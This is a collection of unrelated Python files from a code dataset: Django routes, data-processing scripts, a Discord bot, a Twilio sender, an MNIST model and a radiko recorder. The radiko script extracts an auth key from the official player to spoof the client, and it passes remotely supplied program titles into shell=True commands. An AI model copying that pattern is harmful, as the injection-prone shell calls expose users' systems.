#url(r'^(?P[0-9]+)/serviceTickets/$', views.countryServiceListView, name='countryServiceTickets'),\n url(r'^(?P[A-Z]+)/serviceTickets/$', views.countryServiceListView, name='countryServiceTickets'),\n url(r'^(?P[A-Z]+)/demandTickets/$', views.countryDemandListView, name='countryDemandTickets'),\n url(r'^serviceTickets/(?P[a-z]+)$', views.categoryServiceListView, name='categoryServiceTickets'),\n url(r'^demandTickets/(?P[a-z]+)$', views.categoryDemandListView, name='categoryDemandTickets'),\n url(r'^(?P[A-Z]+)/serviceTickets/(?P[a-z]+)$', views.countryCategoryServiceListView, name='countryCategoryServiceTickets'),\n url(r'^(?P[A-Z]+)/demandTickets/(?P[a-z]+)$', views.countryCategoryDemandListView, name='countryCategoryDemandTickets'),\n url(r'^demand/(?P[0-9]+)/$', views.DemandDetailView.as_view(), name='demandDetail'),\n url(r'^service/(?P[0-9]+)/$', views.ServiceDetailView.as_view(), name='serviceDetail'),\n url(r'^newService/$', views.serviceTicketNew, name='serviceTicketNew'),\n url(r'^newDemand/$', views.demandTicketNew, name='demandTicketNew'),\n url(r'^service/(?P[0-9]+)/edit/$', views.serviceEdit, name='serviceEdit'),\n url(r'^demand/(?P[0-9]+)/edit/$', views.demandEdit, name='demandEdit'),\n url(r'^accounts/(?P[\\w.@+-]+)/$', views.accountView, name='account'),\n url(r'^accounts/(?P[\\w.@+-]+)/edit/$', views.userEdit, name='userEdit'),\n url(r'^serviceTickets/(?P[\\w.@+-]+)/$', views.userServiceListView, name='userServiceTickets'),\n url(r'^demandTickets/(?P[\\w.@+-]+)/$', views.userDemandListView, name='userDemandTickets'),\n url(r'^contact/$', views.contactView, name='contact'),\n url(r'^thanks/$', views.thanksView, name='thanks'),\n url(r'^about/$', views.aboutView, name='about'),\n url(r'^term/$', views.termOfServiceView, name='term'),\n url(r'^deleteDemand/(?P[0-9]+)/$', views.deleteDemandTicket, name='deleteDemand'),\n url(r'^deleteService/(?P[0-9]+)/$', views.deleteServiceTicket, name='deleteService'),\n #url(r'^i18n/', include('django.conf.urls.i18n')),\n]","sub_path":"travel/travelondesk/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"532926003","text":"# coding: utf-8\nimport argparse\nimport csv\nimport gzip\nimport os\nimport itertools\n\nimport numpy as np\n\n\ndef grouper(iterable, n, fillvalue=None):\n \"\"\"Collect data into fixed-length chunks or blocks\"\"\"\n # grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx\n args = [iter(iterable)] * n\n return itertools.izip_longest(fillvalue=fillvalue, *args)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('input', nargs=\"+\")\n parser.add_argument('--labels', nargs=\"+\")\n parser.add_argument('--output') ## directory of output\n\n parser.add_argument('--power', type=float, default=1.0)\n parser.add_argument('--cutoff', type=float, default=0.0)\n\n parser.add_argument('--format', choices=('multiplex', 'monolayer', 'summed'))\n parser.add_argument('--cutoff_type', choices=('independent', 'group'))\n\n args = parser.parse_args()\n\n project = os.path.basename(args.labels[0][:-4]).split('_')[0]\n\n labels = dict()\n for label_file in args.labels:\n d1 = os.path.basename(label_file[:-4]).split('_')[1] ## get the data-type\n with open(label_file) as f:\n rdr = csv.reader(f, delimiter='\\t')\n rdr.next()\n labels[d1] = {r[0]:i for i,r in enumerate(rdr)}\n\n label_u = sorted(reduce(set.union, labels.values(), set())) ## find the union of all genes\n\n mmaps = dict()\n for input_file in args.input: ## expects multiple files \n d1,d2 = os.path.basename(input_file).split('_')[0].split('-') ## gets d1-d2_ info ## but this should be the set of labels in each matrix\n\n mmaps[(d1,d2)] = np.memmap(input_file, dtype=np.float64, ## reads e_value matrix in to memmap format\n mode='r', shape=(len(labels[d1]), len(labels[d2])))\n ## Resicnded: Should work because data is loaded w/ correct dimensions\n\n\n ## creates map between data-type pair and enrichment matrix (e_values), reads enrichment matrix as memmap\n\n dtypes = list(enumerate(sorted(reduce(set.union, mmaps, set())))) ## find set of data-types\n\n \n ## gene to index mapping file generate, using labels_u\n output_label_path = os.path.join(args.output,project+'_'+args.format+'_'+str(args.cutoff)+'_labels.txt')\n with open(output_label_path,'w') as OUT:\n print >> OUT, '\\n'.join('{}'.format(g) for g in label_u)\n\n ## set the new output file as the info + the project id name\n output_file_path = os.path.join(args.output,project+'_'+args.format+'_'+str(args.cutoff)+'.txt.gz')\n with gzip.open(output_file_path, 'w') as OUT:\n if args.format == 'multiplex':\n print >> OUT, '*Vertices {:d}'.format(len(label_u))\n print >> OUT, '\\n'.join('{:d} \"{}\"'.format(i,g) for i,g in enumerate(label_u))\n print >> OUT, '*Multiplex'\n\n for g1g2 in grouper(itertools.combinations(enumerate(label_u), 2), 10000): ## consider all data-combinations, chunked in 10K\n lines = []\n for (i1,g1),(i2,g2) in itertools.ifilter(None, g1g2): \n pair_edges = []\n for (j1,d1),(j2,d2) in itertools.product(dtypes, dtypes): ## get data-type combinations\n if g1 in labels[d1] and g2 in labels[d2]:\n if j1 <= j2:\n e = mmaps[(d1,d2)][labels[d1][g1], labels[d2][g2]]\n else:\n e = mmaps[(d2,d1)][labels[d2][g2], labels[d1][g1]]\n\n if ((args.cutoff_type == 'independent' and e > args.cutoff)\n or (args.cutoff_type == 'group' and e > 0.0)):\n\n pair_edges.append((j1, j2, e))\n\n if pair_edges and (args.cutoff_type != 'group'\n or sum(e for j1,j2,e in pair_edges) > args.cutoff):\n if args.format == 'multiplex':\n lines.extend('{:d}\\t{:d}\\t{:d}\\t{:d}\\t{:f}'.format(j1, i1, j2, i2, e ** args.power)\n for j1,j2,e in pair_edges)\n elif args.format == 'monolayer':\n lines.extend('{:d}\\t{:d}\\t{:f}'.format(i1, i2, e ** args.power)\n for j1,j2,e in pair_edges)\n elif args.format == 'summed':\n lines.append('{:d}\\t{:d}\\t{:f}'.format(i1, i2, sum(e for j1,j2,e in pair_edges) ** args.power))\n\n if lines:\n print >> OUT, '\\n'.join(lines)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"M05_write_multiplex_network.py","file_name":"M05_write_multiplex_network.py","file_ext":"py","file_size_in_byte":4535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"135067190","text":"\nimport matplotlib.pyplot as plt\nimport math\nimport re\nimport sys\n\n\n\nclass Node:\n def __init__(self,val):\n self.val = val #containing a tuple with id, chr, position\n self.ref = None # the pointer initially points to nothing\n\n def getChr(self):\n return int(re.split('p|q', self.val[1])[0])\n\n def getArm(self):\n if 'p' in self.val[1]:\n return 'p'\n\n else:\n return 'q'\n\n def getPos(self):\n s = re.split('\\(|\\,|\\)', self.val[2])\n return (s[1], s[2])\n\n def getNext(self):\n return self.ref\n\n def setNext(self,newnext):\n self.ref = newnext\n\n def setData(self,newdata):\n self.val = newdata\n\n\n\nclass LinkedList: \n def __init__(self): \n self.start_node = None #Initially Start Node is Null \n\n def traverse_list(self, value=False): \n new_list =[] \n if self.start_node is None: \n print(\"List is empty\") \n return None\n else: \n n = self.start_node \n while n is not None: \n if value == False: \n new_list.append(n) #append the whole node \n n = n.ref #next node will be the one pointing to \n else: \n new_list.append(n.val) #append only the value \n n = n.ref \n return new_list \n \n def insert_at_start(self, data): \n new_node = Node(data) \n new_node.ref = self.start_node \n self.start_node= new_node \n \n def append(self, data): \n current = self.start_node \n while current.getNext() != None: \n current = current.getNext() \n\n current.ref= Node(data)\n\n return current\n \n \n def get_first_item(self): \n return self.start_node \n \n def insertion_sort(self): \n h =self.start_node \n if h == None: \n return None \n #Make the first node the start of the sorted list. \n sortedList= h \n h=h.ref \n sortedList.ref= None \n while h != None: \n curr= h \n h=h.ref \n if curr.getChr() search.ref.getChr(): \n search= search.ref \n #current goes after search. \n curr.ref= search.ref \n search.ref= curr \n \n sorted_list = LinkedList() \n while sortedList: \n if sorted_list.get_first_item() == None: \n sorted_list.insert_at_start(sortedList.val) \n else: \n sorted_list.append(sortedList.val) \n \n sortedList = sortedList.ref \n \n return sorted_list \n \n def contains(self,val): \n if self.start_node == None: \n return Node(None) \n else: \n p = self.start_node \n while p is not None: \n if val == p.val[0]: \n return p \n p = p.ref \n return Node(None) #Returns an empty node if no element is found \n \n def calc_dist(self, cut_off): \n output_list = LinkedList() \n \n for i in range(len(self.traverse_list())): \n for j in range(i + 1, len(self.traverse_list())): #traverse through all the possibilities\n node1, node2 = self.traverse_list()[i], self.traverse_list()[j]\n chrom1, chrom2 = node1.getChr(), node2.getChr()\n arm1, arm2 = node1.getArm(), node2.getArm()\n \n existing_node = output_list.contains((chrom1, arm1))\n \n if output_list.get_first_item() == None: #First element in the list \n output_list.insert_at_start(((chrom1, arm1), 0)) \n \n elif existing_node.val == None: #if new chr and arm\n output_list.append(((chrom1, arm1), 0))\n \n existing_node = output_list.contains((chrom1, arm1))\n \n if chrom1 == chrom2 and arm1 == arm2: #if nodes have same chr and arm, calculate distance \n xy_node1 = node1.getPos() \n xy_node2 =node2.getPos() \n dist = math.sqrt((float(xy_node1[0])-float(xy_node2[0]))**2+(float(xy_node1[1])-float(xy_node2[1]))**2) \n if dist <= cut_off: \n existing_node.setData(((chrom1, arm1), existing_node.val[1] +1))\n \n \n return output_list\n\n\ninput_file=sys.argv[1]\nk = sys.argv[2]\n\n\nf= open(input_file,\"r\") \nmy_list = LinkedList() \nfor line in f.readlines(): \n \n line= line.strip('\\n').split('\\t') \n if my_list.get_first_item() == None: \n my_list.insert_at_start((line[0],line[1],line[2])) \n \n else: \n my_list.append((line[0],line[1],line[2])) \n \n\nsorted_list = my_list.insertion_sort()\noutput = sorted_list.calc_dist(1)\n\noutput_file ='output.txt'\n\nout_f = open(output_file, \"w\")\n\nfor line in output.traverse_list(value=True):\n out_f.write(str(line[0][0])+line[0][1]+ '\\t'+ str(line[1])+'\\n')\nout_f.close()\n\n","sub_path":"APA_newnew.py","file_name":"APA_newnew.py","file_ext":"py","file_size_in_byte":5824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"114668067","text":"import os\ndef sendwhatsappmessage(message):\n '''\n message: message to be sent\n '''\n auth_token=os.environ['auth_token']\n account_sid=os.environ['account_sid']\n my_phone_no=os.environ['my_phone_no']\n from twilio.rest import Client\n client=Client(account_sid,auth_token)\n to=f\"whatsapp:+91{my_phone_no}\"\n from_=\"whatsapp:+14155238886\"\n body=message\n message=client.messages.create(from_=from_,body=body,to=to)\n print(message.status)\nif __name__==\"__main__\":\n sendwhatsappmessage(\"test message\")","sub_path":"whatsapp.py","file_name":"whatsapp.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"359754100","text":"from qc_grader.grade import grade_json, submit_json\n\n\ndef format_submission(\n f12: float,\n qubit_index: int,\n backend_name: str\n) -> dict:\n return {\n 'f12': f12,\n 'qubit_index': qubit_index,\n 'backend_name': backend_name\n }\n\n\ndef grade_ex4(\n f12: float,\n qubit_index: int,\n backend_name: str\n) -> None:\n try:\n submission = format_submission(f12, qubit_index, backend_name)\n ok, _ = grade_json(submission, 'ex4')\n if ok:\n print('Feel free to submit your answer.\\r\\n')\n except Exception as err:\n print(err)\n\n\ndef submit_ex4(\n f12: float,\n qubit_index: int,\n backend_name: str\n) -> None:\n try:\n submission = format_submission(f12, qubit_index, backend_name)\n submit_json(submission, 'ex4')\n except Exception as err:\n print(err)\n","sub_path":"qc_grader/exercises/iqc_2021/exercise4.py","file_name":"exercise4.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"216220467","text":"import discord\r\nfrom discord.ext import commands\r\nfrom discord.ext.commands import Bot\r\nimport asyncio\r\nimport random\r\nimport requests\r\nimport os\r\n\r\nimport discord\r\nfrom discord import Game\r\nimport asyncio as asyncio\r\nimport asyncio as asyncio\r\nimport discord\r\nfrom discord import Game\r\nfrom commands import cmdHelp, cmdInvite, cmdText, cmdClear, cmdTeam, cmdMovehost, cmdMoveall, cmdMoveteams\r\nfrom commands import STATIC\r\nfrom discord import Embed\r\n\r\nimport perms\r\n\r\nimport time\r\n\r\n\r\nclient = discord.Client()\r\n\r\ncommands = {\r\n \"help\" : cmdHelp,\r\n \"invite\" : cmdInvite,\r\n \"text\" : cmdText,\r\n \"clear\" : cmdClear,\r\n \"team\" : cmdTeam,\r\n \"movehost\" : cmdMovehost,\r\n \"moveall\" : cmdMoveall,\r\n \"moveteams\" : cmdMoveteams,\r\n}\r\n\r\n@client.event\r\n@asyncio.coroutine\r\ndef on_ready():\r\n\r\n print(\"Bot ist online auf:\\n\")\r\n for s in client.servers:\r\n print(\"- %s (%s) \" % (s.name, s.id))\r\n yield from client.change_presence(game=Game(name=\"/help für alle Befehle\"))\r\n\r\n@client.event\r\n@asyncio.coroutine\r\ndef on_message(message):\r\n if message.content.startswith(STATIC.PREFIX):\r\n invoke = message.content[1:].split(\" \")[0]\r\n args = message.content.split(\" \")[1:]\r\n arg1 = message.content.split(\" \")[1:-len(args) + 1]\r\n arg2 = message.content.split(\" \")[2:]\r\n if commands.__contains__(invoke):\r\n\r\n cmd = commands[invoke]\r\n try:\r\n if not perms.check(message.author, cmd.perm):\r\n yield from client.send_message(message.channel, embed=Embed(color=discord.Color.red(), description=(\"Du hast keine Rechte diesen Command auszufürhen, /help für eine Liste!\")))\r\n return\r\n yield from cmd.ex(args, message, client, invoke, arg1, arg2)\r\n except:\r\n cmd.ex(args, message, client, invoke, arg1, arg2)\r\n pass\r\n\r\n else:\r\n from discord import Color\r\n yield from client.send_message(message.channel, embed=Embed(color=discord.Color.red(), description=(\"Der Command /%s existiert nicht, /help für eine Liste!\" % invoke)))\r\n \r\n@client.event\r\n@asyncio.coroutine\r\ndef on_voice_state_update(before, after):\r\n Zeit =time.strftime(\"%d.%m.%Y %H:%M:%S\")\r\n if before.voice.voice_channel == None:\r\n yield from client.send_message(client.get_channel(\"553625993441443843\"), (\" :white_check_mark: %s hat den \\n**%s** Voice-Channel betreten\\n%s\" % (after.mention, after.voice.voice_channel, Zeit)))\r\n else:\r\n if after.voice.voice_channel == None:\r\n yield from client.send_message(client.get_channel(\"553625993441443843\"), (\" :small_red_triangle_down: %s hat den \\n**%s** Voice-Channel verlassen\\n%s\" % (before.mention, before.voice.voice_channel, Zeit)))\r\n else:\r\n if before.voice.voice_channel != after.voice.voice_channel:\r\n yield from client.send_message(client.get_channel(\"553625993441443843\"), (\":twisted_rightwards_arrows: %s hat vom \\n**%s** Voice-Channel zum \\n**%s** Voice-Channel gewechselt\\n%s\" % (after.mention, before.voice.voice_channel, after.voice.voice_channel, Zeit)))\r\n\r\nclient.run(str(os.environ.get('BOT_TOKEN')))\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"307725754","text":"\n#================================================================================================\n# In this data recognition script, I will be showing how to that takes an image file #\n# containing a handwritten digit and identifies the digit using a supervised #\n# learning algorithm and the MNIST dataset. #\n# All dataset used in this script are handwritten by myself using paint on windows #\n# ============================================================================================== #\n# Tutorial followed to complete and understand what to do from: #\n# http://dataaspirant.com/2017/05/03/handwritten-digits-recognition-tensorflow-python/, #\n# https://github.com/ianmcloughlin/jupyter-teaching-notebooks/blob/master/mnist.ipynb, #\n# https://www.tensorflow.org/tutorials/ #\n# https://www.tensorflow.org/tutorials/keras/basic_classification #\n# https://github.com/docketrun/Recognise-Handwritten-Digits-using-MNIST-Data # \n# #\n# #\n# #\n#=============================================================================================== #\n\n#import modules\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n\n#import data\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\n\n# Create the model\nx = tf.placeholder(tf.float32, [None, 784])\nW = tf.Variable(tf.zeros([784, 10]))\nb = tf.Variable(tf.zeros([10]))\ny = tf.nn.softmax(tf.matmul(x, W) + b)\n\n# Define loss and optimizer\ny_ = tf.placeholder(tf.float32, [None, 10])\ncross_entropy = -tf.reduce_sum(y_*tf.log(y))\ntrain_step = tf.train.GradientDescentOptimizer(0.01).minimize(cross_entropy)\n\ninit_op = tf.initialize_all_variables()\nsaver = tf.train.Saver()\n\n\n# Train the model and save the model to disk as a model.ckpt file\n# file is stored in the same directory as this python script is started\n\"\"\"\nThe use of 'with tf.Session() as sess:' is taken from the Tensor flow documentation\non on saving and restoring variables.\nhttps://www.tensorflow.org/versions/master/how_tos/variables/index.html\n\"\"\"\nwith tf.Session() as sess:\n sess.run(init_op)\n for i in range(1000):\n batch_xs, batch_ys = mnist.train.next_batch(100)\n sess.run(train_step, feed_dict={x: batch_xs, y_: batch_ys})\n \n save_path = saver.save(sess, \"./model1.ckpt\")\n print (\"Model saved in file: \", save_path)\n\n","sub_path":"Handwritten_File/create_model_1.py","file_name":"create_model_1.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"605576639","text":"# coding: utf-8\nimport os\nimport datetime\nimport subprocess\nimport sys\nimport time\nimport base64\nimport asyncio\nfrom xml.etree import ElementTree as ET\n\nimport requests\nimport click\nfrom prettytable import PrettyTable\nimport threading\n\nfrom datetime import timedelta\n\n\n# http://stackoverflow.com/questions/4995733/how-to-create-a-spinning-command-line-cursor-using-pythonのパクリ\nclass Spinner:\n busy = False\n delay = 0.5\n\n @staticmethod\n def spinning_cursor():\n while 1:\n for cursor in '|/-\\\\':\n yield cursor\n\n def __init__(self, delay=None):\n self.spinner_generator = self.spinning_cursor()\n if delay and float(delay):\n self.delay = delay\n\n def spinner_task(self):\n while self.busy:\n sys.stdout.write(next(self.spinner_generator))\n sys.stdout.flush()\n time.sleep(self.delay)\n sys.stdout.write('\\b')\n sys.stdout.flush()\n\n def start(self):\n self.busy = True\n threading.Thread(target=self.spinner_task).start()\n\n def stop(self):\n self.busy = False\n time.sleep(self.delay)\n\n\nclass Response(object):\n def __init__(self, *args, **kwargs):\n for k, v in kwargs.items():\n self.__setattr__(k, v)\n\n\nclass Radipy(object):\n player_url = 'http://radiko.jp/apps/js/flash/myplayer-release.swf'\n fms1_url = 'https://radiko.jp/v2/api/auth1_fms'\n fms2_url = 'https://radiko.jp/v2/api/auth2_fms'\n LANG = 'ja_JP.utf8'\n date = datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%d-%H')\n tmp_path='./tmp'\n playerfile='%s/player.%s.swf' % (tmp_path, date)\n keyfile = '%s/authkey.%s.jpg' % (tmp_path, date)\n playlistfile = '%s/playlist.%s.m3u8' % (tmp_path, date)\n auth_response = Response()\n auth_success_response = Response()\n output_path = './output'\n\n def __init__(self, station_id, ft):\n self.station_id = station_id\n self.ft = ft\n partialkey = ''\n self.stream_url = ''\n self.area_id = ''\n self.title = ''\n\n @staticmethod\n def clear():\n subprocess.call('rm -v %s/*.jpg' % tmp_path, shell=True)\n subprocess.call('rm -v %s/*.swf' % tmp_path, shell=True)\n\n def authenticate(self):\n self._get_playerfile()\n self._get_keyfile()\n self._get_auth1()\n self._generate_particlekey()\n self._get_auth2()\n print('--------------------------')\n print('authentication success.')\n\n def get_channels(self):\n self.authenticate()\n self._get_area_id()\n self._get_area_channels()\n\n def create(self):\n self.authenticate()\n self._get_area_id()\n self._get_stream_url()\n spinner = Spinner()\n sys.stdout.write(\"Now Downloading...\")\n spinner.start()\n if self._create_aac():\n sys.stdout.write('finish!!')\n else:\n sys.stdout.write('failed!!')\n spinner.stop()\n\n def _get_playerfile(self):\n if not os.path.exists(self.tmp_path):\n subprocess.call('mkdir {}'.format(self.tmp_path), shell=True)\n if not os.path.exists(self.playerfile):\n print('create playerFile...')\n res = requests.get(self.player_url)\n if res.status_code == 200:\n with open(self.playerfile, 'wb') as file:\n file.write(res.content)\n if not os.path.exists(self.playerfile):\n print('PlayerFile is not created.')\n\n def _get_keyfile(self):\n if not os.path.exists(self.tmp_path):\n subprocess.call('mkdir {}'.format(self.tmp_path), shell=True)\n if not os.path.exists(self.keyfile):\n print('create KeyFile...')\n subprocess.call('swfextract -b 12 {} -o {}'.format(self.playerfile, self.keyfile), shell=True)\n if not os.path.exists(self.keyfile):\n print('Keyfile is not created.')\n\n def _get_auth1(self):\n print('access auth1_fms...')\n headers = {\n 'Host': 'radiko.jp',\n 'pragma': 'no-cache',\n 'X-Radiko-App': 'pc_ts',\n 'X-Radiko-App-Version': '4.0.0',\n 'X-Radiko-User': 'test-stream',\n 'X-Radiko-Device': 'pc'\n }\n res = requests.post(url=self.fms1_url, headers=headers)\n self.auth_response.body = res.text\n self.auth_response.headers = res.headers\n self.auth_response.authtoken = self.auth_response.headers['x-radiko-authtoken']\n self.auth_response.offset = int(self.auth_response.headers['x-radiko-keyoffset'])\n self.auth_response.length = int(self.auth_response.headers['x-radiko-keylength'])\n\n def _generate_particlekey(self):\n print('generate particleKey...')\n f = open(self.keyfile, 'rb+')\n f.seek(self.auth_response.offset)\n data = f.read(self.auth_response.length)\n self.partialkey = base64.b64encode(data)\n\n def _get_auth2(self):\n print('access auth2_fms...')\n headers ={\n 'pragma': 'no-cache',\n 'X-Radiko-App': 'pc_ts',\n 'X-Radiko-App-Version': '4.0.0',\n 'X-Radiko-User': 'test-stream',\n 'X-Radiko-Device': 'pc',\n 'X-Radiko-Authtoken': self.auth_response.authtoken,\n 'X-Radiko-Partialkey': self.partialkey,\n }\n res = requests.post(url=self.fms2_url, headers=headers)\n self.auth_success_response.body = res.text\n self.auth_success_response.headers = res.headers\n\n def _get_area_id(self):\n area = self.auth_success_response.body.strip().split(',')\n self.area_id = area[0]\n print('area_id: %s' % self.area_id)\n\n def _get_area_channels(self):\n area_api_url = \"http://radiko.jp/v2/api/program/today\"\n params = {'area_id': self.area_id}\n res = requests.get(url=area_api_url, params=params)\n channels_xml = res.content\n tree = ET.fromstring(channels_xml)\n channels = tree.findall('.//station')\n table = PrettyTable(['id', '名前'])\n table.align['id'] = 'l'\n table.align['名前'] = 'l'\n table.padding_width = 2\n for channel in channels:\n table.add_row([channel.attrib['id'], channel.find('name').text])\n print(table)\n\n def _get_stream_url(self):\n try:\n datetime_api_url = 'http://radiko.jp/v3/program/date/{}/{}.xml'.format(self.ft[:8], self.area_id)\n res = requests.get(url=datetime_api_url)\n channels_xml = res.content\n tree = ET.fromstring(channels_xml)\n station = tree.find('.//station[@id=\"{}\"]'.format(self.station_id))\n prog = station.find('.//prog[@ft=\"{}\"]'.format(self.ft))\n to = prog.attrib['to']\n\n # 日を跨いでいる場合は前の日の番組表を探す\n except AttributeError:\n original_date = datetime.datetime(int(self.ft[:4]), int(self.ft[4:6]), int(self.ft[6:8]))\n target_date = original_date - timedelta(days=1)\n target_date_str = target_date.strftime(\"%Y%m%d\")\n datetime_api_url = 'http://radiko.jp/v3/program/date/{}/{}.xml'.format(target_date_str, self.area_id)\n res = requests.get(url=datetime_api_url)\n channels_xml = res.content\n tree = ET.fromstring(channels_xml)\n station = tree.find('.//station[@id=\"{}\"]'.format(self.station_id))\n prog = station.find('.//prog[@ft=\"{}\"]'.format(self.ft))\n to = prog.attrib['to']\n\n self.title = prog.find('.//title').text.replace(' ', '_').replace(' ', '_')\n table = PrettyTable(['title'])\n table.add_row([self.title])\n table.padding_width = 2\n print(table)\n self.stream_url = 'https://radiko.jp/v2/api/ts/playlist.m3u8?l=15&station_id={}&ft={}&to={}'.format(\n self.station_id,\n self.ft,\n to\n )\n\n def _create_aac(self):\n try:\n if not os.path.exists('%s%s' % (self.output_path, self.title)):\n subprocess.call('mkdir -p {}/{}'.format(\n self.output_path, self.title), shell=True)\n cmd = ('ffmpeg '\n '-loglevel fatal '\n '-n -headers \"X-Radiko-AuthToken: {}\" '\n '-i \"{}\" '\n '-vn -acodec copy \"{}/{}/{}.aac\"'.format(\n self.auth_response.authtoken,\n self.stream_url,\n self.output_path,\n self.title,\n '{}_{}'.format(self.title, self.ft[:8])\n ))\n subprocess.call(cmd, shell=True)\n print('{}/{}/{}.aac'.format(self.output_path, self.title, '{}_{}'.format(self.title, self.ft[:8])))\n return True\n except:\n return False\n\n\n@click.command(help='Radipy is CLI radiko Downloader written by python3.')\n@click.option('-a', '--area', is_flag=True, help='print station id & name in your area')\n@click.option('-id', type=str, help='set station id')\n@click.option('-ft', type=str, help='set start time')\n@click.option('--clear', is_flag=True, help='clear authkey and player in tmp dir')\ndef main(area, id, ft, clear):\n if clear:\n Radipy.clear()\n if area:\n radipy = Radipy(0, 0)\n radipy.get_channels()\n if id and ft:\n radipy = Radipy(station_id=id, ft=ft)\n radipy.create()\n\nif __name__ == '__main__':\n main()\n","sub_path":"radipy.py","file_name":"radipy.py","file_ext":"py","file_size_in_byte":9482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"341699734","text":"from django import template\nfrom django.template.defaultfilters import stringfilter\n\nregister = template.Library()\n\n@register.filter\n@stringfilter\ndef container_status(value):\n \"\"\"\n Returns container status as a bootstrap class\n \"\"\"\n cls = ''\n if value.find('Up') > -1:\n cls = 'success'\n elif value.find('Exit 0') > -1:\n cls = 'info'\n else:\n cls = 'important'\n return cls\n\n","sub_path":"shipyard/templatetags/shipyard.py","file_name":"shipyard.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"124647719","text":"import sqlite3\n\nMY_DATABASE = \"db/quests.db\"\n\n\ndef remove_zero_skills(levels):\n \"\"\"Given a dict of skills, removes all skills that require level 0 and\n returns the ones remaining.\n\n Parameters:\n levels (dict): the original dictionary containing all the\n skills\n\n Returns:\n list>: the list of skills and levels, without the 0s\n \"\"\"\n actual_skills = []\n for skill in levels:\n if levels[skill] != 0:\n actual_skills.append((skill, levels[skill]))\n return actual_skills\n\n\ndef string_skills(levels):\n \"\"\" Given a dictionary of skills, replaces all zeros with an empty string.\n Also makes everything else a string.\n\n Parameters:\n levels(dict): the original dictionary containing all the\n skills.\n\n Returns:\n dict: the new dictionary with everything in strings and\n zero's blanked with empty strings.\n \"\"\"\n for skill in levels:\n if levels[skill] == 0:\n levels[skill] = \"\"\n else:\n levels[skill] = str(levels[skill])\n return levels\n\n\ndef get_level_dictionary(result):\n \"\"\"\n Given a tuple from the quest_levels relation, turn it into a dictionary\n of skill name to required level.\n\n Parameters:\n result (tuple): a tuple consisting of one row from the quest_levels\n relation\n\n Returns:\n dict>: each skill mapped to its required level\n \"\"\"\n return {'Agility': result[1],\n 'Attack': result[2],\n 'Constitution': result[3],\n 'Construction': result[4],\n 'Cooking': result[5],\n 'Crafting': result[6],\n 'Defence': result[7],\n 'Divination': result[8],\n 'Dungeoneering': result[9],\n 'Farming': result[10],\n 'Firemaking': result[11],\n 'Fishing': result[12],\n 'Fletching': result[13],\n 'Herblore': result[14],\n 'Hunter': result[15],\n 'Magic': result[16],\n 'Mining': result[17],\n 'Prayer': result[18],\n 'Ranged': result[19],\n 'Runecrafting': result[20],\n 'Slayer': result[21],\n 'Smithing': result[22],\n 'Strength': result[23],\n 'Summoning': result[24],\n 'Thieving': result[25],\n 'Woodcutting': result[26]\n }\n\n\ndef get_all_quest_names():\n \"\"\"Queries the database for all the quest names\n\n Returns:\n list> a list of tuples of which the first (and only) element\n is the name of the quest\n \"\"\"\n conn = sqlite3.connect(MY_DATABASE)\n cur = conn.cursor()\n cur.execute(\"SELECT name FROM quest_details\")\n results = cur.fetchall()\n cur.close()\n conn.close()\n if results is None:\n return []\n return results\n\n\ndef get_quest_info(quest_name):\n \"\"\" For the quest with the given name, it returns a dictionary of all the\n information.\n\n Parameters:\n quest_name (str): the name of the quest we are investigating\n\n Returns:\n dict: a dictionary that maps the name of the quest info to\n its actual info\n \"\"\"\n conn = sqlite3.connect(MY_DATABASE)\n cur = conn.cursor()\n\n cur.execute(\"\"\" SELECT * FROM quest_details WHERE name=?\"\"\",\n (quest_name,))\n results_details = cur.fetchone()\n\n cur.execute(\"\"\" SELECT * FROM quest_levels WHERE name=?\"\"\",\n (quest_name,))\n result_levels = remove_zero_skills(get_level_dictionary(cur.fetchone()))\n\n cur.execute(\"\"\" SELECT pre_quest FROM pre_quests WHERE main_quest=?\"\"\",\n (quest_name, ))\n result_pre_quests = [x[0] for x in cur.fetchall()]\n result_pre_quests.sort()\n\n cur.execute(\"\"\" SELECT requirement\n FROM quest_other_requirements\n WHERE name=?\"\"\", (quest_name,))\n result_other_requirements = [x[0] for x in cur.fetchall()]\n\n cur.execute(\"\"\" SELECT name\n FROM quest_series\n WHERE quest=?\"\"\", (quest_name, ))\n result_quest_series = [x[0] for x in cur.fetchall()]\n\n cur.execute(\"\"\" SELECT name\n FROM quest_series_related\n WHERE quest=?\"\"\", (quest_name,))\n result_quest_series_related = [x[0] for x in cur.fetchall()]\n\n # Make this all into a dictionary so we can refer to it easily inside the\n # HTML\n final_result = {\"name\": results_details[0],\n \"free?\": \"yes\" if results_details[1] else \"no\",\n \"age\": results_details[2],\n \"difficulty\": results_details[3],\n \"length\": results_details[4],\n \"quest points\": results_details[5],\n \"skills\": result_levels,\n \"pre quests\": result_pre_quests,\n \"other requirements\": result_other_requirements,\n \"quest series\": result_quest_series,\n \"related quests\": result_quest_series_related\n }\n\n cur.close()\n conn.close()\n return final_result\n\n\ndef get_quest_info_recursive(quest_name, parent_quest, all_quests):\n \"\"\" A recursive helper method for get_quest_info_including_sub. Will\n process everything including subquests correctly.\n\n Parameters:\n quest_name(str): the name of the quest\n parent_quest(str): the quest that this 